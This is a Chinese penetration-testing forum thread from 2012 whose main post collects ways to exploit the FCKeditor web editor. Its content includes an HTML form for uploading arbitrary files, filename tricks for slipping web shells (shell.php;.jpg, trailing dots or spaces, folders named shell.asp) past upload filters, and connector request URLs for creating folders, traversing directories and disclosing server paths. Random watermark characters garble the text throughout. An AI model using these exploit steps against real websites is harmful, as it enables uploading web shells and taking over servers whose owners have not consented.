找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 FCKeditor漏洞利用总结
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2600|回复: 1
打印 上一主题 下一主题

FCKeditor漏洞利用总结

[复制链接]
荒村狂客
跳转到指定楼层
楼主
发表于 2012-9-5 20:23:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结

查看编辑器版本
- O- H: b6 s" e, bFCKeditor/_whatsnew.html, W+ K, Q6 Y0 o' n+ _
—————————————————————————————————————————————————————————————

2. Version 2.2 版本6 i9 q. _7 u+ y- L( E6 ?% c) V
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
: d7 c5 {) ~0 c0 k, d5 A6 b—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。  e& @8 I' G8 H, `
<form id="frmUpload" enctype="multipart/form-data"
, u4 x6 Q. @7 ^+ B. Daction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br># D+ A9 F! u: o, O4 @
<input type="file" name="NewFile" size="50"><br>
$ b( Y& h+ x; q9 t/ _<input id="btnUpload" type="submit" value="Upload">
( H# ]* ]/ ?6 z9 E+ G. Q" ]</form>5 h9 u5 a* F$ c  E# z7 v
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
- a( _2 k2 Z: n        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
6 t% s0 i: @" j- _, r* y    4.1:提交shell.php+空格绕过1 ], u# \6 b2 P8 H, y3 n( B, @
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。. |$ G, _3 P  o/ n- n' D) ]
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。- t& w$ S" Q5 r: j0 S
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
2 O; u: X9 n- B8 G: C3 p2 SFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
# N1 U: }! A+ q& BFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
$ {; |" |8 U2 a1 }+ G: h  [—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
" F* o2 o! [3 m# b1 H6 y( l8 QFCKeditor/editor/filemanager/browser/default/connectors/test.html$ C/ d- c8 H  \* F  m3 }
FCKeditor/editor/filemanager/upload/test.html
, s+ P2 b/ y; K" `8 I" S: YFCKeditor/editor/filemanager/connectors/test.html/ [' P6 W  @: ^6 R3 |. }
FCKeditor/editor/filemanager/connectors/uploadtest.html
& Z7 Q2 X8 v* }: J# O9 a8 P—————————————————————————————————————————————————————————————# T8 j9 n4 u" }% ?0 S

7.常用上传地址7 G" D5 P, y4 W* J# ?
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/ Z% y' r! @( YFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
! S1 i! F% ?4 @0 r9 QFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
5 u1 @4 y# f7 @/ |9 L: QJSP 版:+ t, c) q/ ^& u
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
" U. b" b# F0 L- \( z注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
' G0 n1 f9 R. o& j件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
6 V3 j2 n" T- v' j" D' k—————————————————————————————————————————————————————————————

8.其他上传地址
: }3 T6 K& w, t9 F+ mFCKeditor/_samples/default.html
4 v- F, l5 _" c3 S+ e5 \4 nFCKeditor/_samples/asp/sample01.asp
  S! s, t- ]+ S% ^/ @FCKeditor/_samples/asp/sample02.asp; g7 ^  r" M' H, }
FCKeditor/_samples/asp/sample03.asp9 {; A/ H4 }# M
FCKeditor/_samples/asp/sample04.asp+ ^/ N9 o3 C9 `; O' f* a) v: j6 e
一般很多站点都已删除_samples 目录,可以试试。
2 ?% N5 M, V3 bFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
, u, g8 F6 R% p: `3 ~' u+ ]—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
9 g% r  p4 [1 D1 TVersion 2.4.1 测试通过! ^2 n+ S* K: L7 s) S7 s: L) E
修改CurrentFolder 参数使用 ../../来进入不同的目录! _( h' _  b, W3 y
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp/ d/ }/ s& Q3 z8 f) `
根据返回的XML 信息可以查看网站所有的目录。6 I! R2 t! t/ y  Z0 E" \2 M
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F7 u0 C( @% d- w/ V" w* S, s9 B; B
也可以直接浏览盘符:
& \7 d" Y' E# ]  T; B+ @JSP 版本:
+ h  v8 N1 Z2 h; v" r! N, QFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F2 H/ @" Z# a: n9 [) {9 M
—————————————————————————————————————————————————————————————

10.爆路径漏洞
8 x3 x* d- Y. |& U4 m3 {# jFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp; ?) E: x1 b/ g$ T! N  P
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题  N$ w2 w) y- i4 Q0 e/ W: f
        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
7 @- v' Y; a1 }  g, t9 w/ e* F脆弱描述:
: n! S' K# n- l3 O1 FFCKeditor v2.4.3 中File 类别默认拒绝上传类型:3 p- d: @# E# g  w5 ^. Y% Z2 j7 F0 P6 s
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm& J& @9 E& n% A7 y
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
, n$ d+ T% v, g! c; l1 F& U        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。2 [# [: v( p4 b. _/ _
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

回复

使用道具 举报

admin
沙发
发表于 2012-9-8 22:43:14 | 只看该作者

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表